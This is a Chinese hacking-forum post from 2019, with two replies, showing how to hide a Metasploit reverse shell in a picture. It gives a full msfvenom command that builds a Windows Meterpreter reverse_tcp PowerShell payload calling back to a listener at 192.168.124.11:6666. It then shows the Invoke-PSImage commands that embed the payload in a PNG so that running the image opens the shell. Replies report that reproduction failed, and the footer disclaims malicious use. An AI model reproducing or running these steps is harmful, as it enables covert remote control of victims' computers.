搜索
查看: 3664|回复: 2

利用照片反弹shell

  [复制链接]

78

主题

111

帖子

199

积分

注册会员

Rank: 2

积分
199
发表于 2019-7-3 15:58:41 | 显示全部楼层 |阅读模式
利用工具:
https://github.com/peewpw/Invoke-PSImage

一、首先利用msf创建一个ps1脚本

代码:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.11 LPORT=6666 -f psh-reflection  -o /root/bbs.ps1



然后,我们在找一张图片




(猜猜她是谁?)

将生成的bbs.ps1和图片放在Invoke-PSImage目录下,方便执行命令的时候找文件


首先要执行“Import-Module .\Invoke-PSImage.ps1”命令。再执行“Invoke-PSImage -Script .\bbs.ps1 -Image .\bj.png -Out .\boduo.png“命令进行两者合并。









然后我们到msf配置,运行图片即可得到shell

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
专业装逼!
回复

使用道具 举报

0

主题

34

帖子

76

积分

vip用户

Rank: 6Rank: 6

积分
76
发表于 2019-7-6 14:19:12 | 显示全部楼层
你写的这个,我在之前的一个公众号中也看到过。但是复现失败了,貌似好多人都提到这个问题,按照稳重流程,试了好多遍,都没有反弹成功,不知道自己是哪块出问题,楼主可以将自己的复现过程截图,详细的发一遍嘛
回复 支持 反对

使用道具 举报

0

主题

6

帖子

8

积分

新手开车

Rank: 1

积分
8

活跃会员

发表于 2020-7-27 10:56:43 | 显示全部楼层
反弹有问题 无法建立shell
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

温馨提示
1:发帖请遵守《中华人民共和国网络安全法》,发帖内容不得维护国家的、集体的、个人的利益。
2:请勿发布恶意攻击他人的技术文章、工具、和使用教程,发现后删帖处理。
3:本站的目的在于让更多的人了解网络安全,避免受到他人的恶意攻击。
4:本站中的部分文章,可能会出现一些“技术类手段”,但这仅仅为学习演示所用,而非恶意传播技术。
5:本站中的部分文章,可能转载自互联网。如有侵权行为,联系我们删除即可。
6:学习仅是充实头脑,切勿恶意攻击个人、企业等。所造成的法律后果一切由自己承担,本站及其站长概不负责。
我知道了
快速回复 返回顶部 返回列表